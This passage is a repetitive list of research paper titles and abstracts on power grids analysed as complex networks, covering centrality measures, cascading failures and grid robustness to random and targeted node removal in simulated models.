long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and vertices and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and criteria to measure of vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. More power is transmitted along the lines with less reactance, to reach from the source node to destination node, which gives the edges with less reactance a higher weight in the analysis. The analyzes have been carried out on the IEEE 39 bus system and IEEE 118 Bus System. The new betweenness index can identify the critical lines of the system, either due to their position in the network or by the power they transmit along the network. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: LOCATING CRITICAL LINES IN HIGH-VOLTAGE ELECTRICAL POWER GRIDS paper_content: Electrical power grids are among the infrastructures that are attracting a great deal of attention because of their intrinsic criticality. Here we analyze the topological vulnerability and improvability of the spanish 400 kV, the french 400 kV and the italian 380 kV power transmission grids. For each network we detect the most critical lines and suggest how to improve the connectivity. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Vulnerability Assessment of Power Grid Using Graph Topological Indices paper_content: This paper presents an assessment of the vulnerability of the power grid to blackout using graph topological indexes. Based on a FERC 715 report and the outage reports, the cascading faults of summer WSCC 1996 are reconstructed, and the graphical property of the grid is compared between two cases: when the blackout triggering lines are removed simulating the actual sequence of cascading outages and when the same number of randomly selected lines are removed. The investigation finds that the critical path lengths of the triggering events of the July and August outages of 1996 WSCC blackout are higher than those of no-outage and arbitrary events. In addition, the small world-ness index for each of the outage triggering events is much smaller than that of normal or any no-outage scenario, indicating that events of shifting a network from small world to a random network would be more likely cascaded to wide area outage. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Cascade-based attack vulnerability on the US power grid paper_content: The vulnerability of real-life networks subject to intentional attacks has been one of the outstanding challenges in the study of the network safety. Applying the real data of the US power grid, we compare the effects of two different attacks for the network robustness against cascading failures, i.e., removal by either the descending or ascending orders of the loads. Adopting the initial load of a node j to be Lj !" kj# Rm2Cj km$% a with kj and Cj being the degree of the node j and the set of its neighboring nodes, respectively, where a is a tunable parameter and governs the strength of the initial load of a node, we investigate the response of the US power grid under two attacks during the cascading propagation. In the case of a < 0:7, our investigation by the numerical simulations leads to a counterintuitive finding on the US power grid that the attack on the nodes with the lowest loads is more harmful than the attack on the ones with the highest loads. In addition, the almost same effect of two attacks in the case ofa ! 0:7 may be useful in furthering studies on the control and defense of cascading failures in the US power grid. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and vertices and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and criteria to measure of vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. More power is transmitted along the lines with less reactance, to reach from the source node to destination node, which gives the edges with less reactance a higher weight in the analysis. The analyzes have been carried out on the IEEE 39 bus system and IEEE 118 Bus System. The new betweenness index can identify the critical lines of the system, either due to their position in the network or by the power they transmit along the network. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: LOCATING CRITICAL LINES IN HIGH-VOLTAGE ELECTRICAL POWER GRIDS paper_content: Electrical power grids are among the infrastructures that are attracting a great deal of attention because of their intrinsic criticality. Here we analyze the topological vulnerability and improvability of the spanish 400 kV, the french 400 kV and the italian 380 kV power transmission grids. For each network we detect the most critical lines and suggest how to improve the connectivity. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Vulnerability Assessment of Power Grid Using Graph Topological Indices paper_content: This paper presents an assessment of the vulnerability of the power grid to blackout using graph topological indexes. Based on a FERC 715 report and the outage reports, the cascading faults of summer WSCC 1996 are reconstructed, and the graphical property of the grid is compared between two cases: when the blackout triggering lines are removed simulating the actual sequence of cascading outages and when the same number of randomly selected lines are removed. The investigation finds that the critical path lengths of the triggering events of the July and August outages of 1996 WSCC blackout are higher than those of no-outage and arbitrary events. In addition, the small world-ness index for each of the outage triggering events is much smaller than that of normal or any no-outage scenario, indicating that events of shifting a network from small world to a random network would be more likely cascaded to wide area outage. --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Cascade-based attacks on complex networks. paper_content: We live in a modern world supported by large, complex networks. Examples range from financial markets to communication and transportation systems. In many realistic situations the flow of physical quantities in the network, as characterized by the loads on nodes, is important. We show that for such networks where loads can redistribute among the nodes, intentional attacks can lead to a cascade of overload failures, which can in turn cause the entire or a substantial part of the network to collapse. This is relevant for real-world networks that possess a highly heterogeneous distribution of loads, such as the Internet and power grids. We demonstrate that the heterogeneity of these networks makes them particularly vulnerable to attacks in that a large-scale cascade may be triggered by disabling a single key node. This brings obvious concerns on the security of such systems. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Model for cascading failures in complex networks. paper_content: Large but rare cascades triggered by small initial shocks are present in most of the infrastructure networks. Here we present a simple model for cascading failures based on the dynamical redistribution of the flow on the network. We show that the breakdown of a single node is sufficient to collapse the efficiency of the entire system if the node is among the ones with largest load. This is particularly important for real-world networks with a highly hetereogeneous distribution of loads as the Internet and electrical power grids. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Publicat originalment a: WIT transactions on ecology and the environment, 2009, vol. 121, p. 527-537 --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Attacks and Cascades in Complex Networks paper_content: This paper reviews two problems in the security of complex networks: cas- cades of overload failures on nodes and range-based attacks on links. Cascading failures have been reported for numerous networks and refer to the subsequent failure of other parts of the network induced by the failure of or attacks on only a few nodes. We investigate a mechanism leading to cascades of overload failures in complex networks by constructing a simple model incorporating the flow of physical quantities in the network. The second problem is motivated by the fact that most existing works on se- curity of complex networks consider attacks on nodes rather than on links. We address attacks on links. Our investigation leads to the finding that many scale-free networks are more sensitive to attacks on short-range than on long-range links. Besides its im- portance concerning network security, our result has the unexpected implication that the small-world phenomenon in these scale-free networks is mainly due to short-range links. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: LOCATING CRITICAL LINES IN HIGH-VOLTAGE ELECTRICAL POWER GRIDS paper_content: Electrical power grids are among the infrastructures that are attracting a great deal of attention because of their intrinsic criticality. Here we analyze the topological vulnerability and improvability of the spanish 400 kV, the french 400 kV and the italian 380 kV power transmission grids. For each network we detect the most critical lines and suggest how to improve the connectivity. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Self-organized criticality: An explanation of the 1/f noise. paper_content: We show that dynamical systems with spatial degrees of freedom naturally evolve into a self-organized critical point. Flicker noise, or 1/f noise, can be identified with the dynamics of the critical state. This picture also yields insight into the origin of fractal objects. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive 